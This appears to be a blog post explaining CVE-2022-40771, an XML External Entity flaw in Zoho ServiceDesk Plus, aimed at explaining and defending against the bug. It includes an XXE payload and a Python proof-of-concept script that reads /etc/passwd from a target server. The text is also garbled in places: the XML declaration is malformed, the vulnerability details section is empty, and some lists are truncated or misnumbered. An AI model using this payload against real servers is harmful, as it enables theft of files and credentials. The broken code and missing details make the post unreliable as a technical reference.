---
Introduction
In late 2022, a critical security flaw—CVE-2022-40771—was disclosed in Zoho ManageEngine ServiceDesk Plus (versions 13010 and earlier). This vulnerability is an example of an XML External Entity (XXE) Injection, which can allow attackers to steal sensitive information from affected servers.
Let’s break down how the bug works, see a simple exploitation example, and review how to fix it. This post will walk you through the whole process, using clear language and example code, so you understand both the risk and the real-world impact.
What is an XXE Attack?
When web applications process XML input insecurely, attackers can craft special XML that instructs the server to read local files or make network requests. This happens because of external entities—a feature in XML that lets you define shortcuts for data inside or outside your system.
If the application doesn’t properly lock down XML processing, cybercriminals can use XXE to
- Read sensitive files from the server (like /etc/passwd)
The ServiceDesk Plus Flaw (CVE-2022-40771)
Zoho’s ServiceDesk Plus is a popular IT helpdesk software used widely by companies. Until version 13010, the app didn’t securely handle XML sent to endpoints handling certain requests.
By passing crafted XML to vulnerable endpoints, attackers could get the server to expose data—most dangerously, read arbitrary files like passwords or configuration secrets.
Vulnerability Details:
Result: Information Disclosure
Original Advisory:
- Zoho Security Bulletin
- NIST NVD Entry
Let’s see a basic exploit.
Suppose the endpoint /api/v1/import accepts XML files from users. Instead of normal XML, an attacker sends this:
<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE evil [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<request>
<data>&xxe;</data>
</request>
- <!ENTITY xxe SYSTEM "file:///etc/passwd">> declares a placeholder called xxe that tells the server “fetch the contents of /etc/passwd and use it wherever &xxe; appears.”
- If the server parses this XML with insecure settings, it fetches and inserts the contents of the sensitive file—then sends it back in the response or logs.
A Simple Python Example
Here’s a proof-of-concept exploit using Python’s requests library
import requests
xml_payload = '''
<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE evil [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<request>
<data>&xxe;</data>
</request>
'''
url = 'https://servicedesk-vulnerable.example.com/api/v1/import';
headers = {"Content-Type": "application/xml"}
response = requests.post(url, data=xml_payload, headers=headers)
print(response.text)
If the target is vulnerable, output may include the server’s /etc/passwd file—a huge leak!
Real-World Impact
- Information Disclosure: Attackers could steal credentials, API keys, internal configuration, or other sensitive files.
- Further Attacks: XXE can also open doors to internal network SSRF attacks, allowing lateral movement inside the company’s firewall.
How Did Zoho Fix This?
Zoho patched the vulnerability in ServiceDesk Plus version 13011 and above by disabling external entities in their XML parser.
Scan for Exploitation: Check server logs for suspicious XML or unexpected responses.
3. Limit XML Features: If you develop with XML, always turn off external entities unless strictly needed.
References and Further Reading
- CVE-2022-40771 at NVD
- Zoho ServiceDesk Plus Security Advisory
- OWASP XXE Guide_Processing)
- Official Patch Notes
In Summary
CVE-2022-40771 is a textbook example of why XML parsing needs security. If you run ServiceDesk Plus and haven’t updated since late 2022, you’re at risk from attackers stealing sensitive files via XXE attacks. Always patch, monitor, and review XML security practices.
Timeline
Published on: 11/23/2022 18:15:00 UTC
Last modified on: 11/29/2022 20:19:00 UTC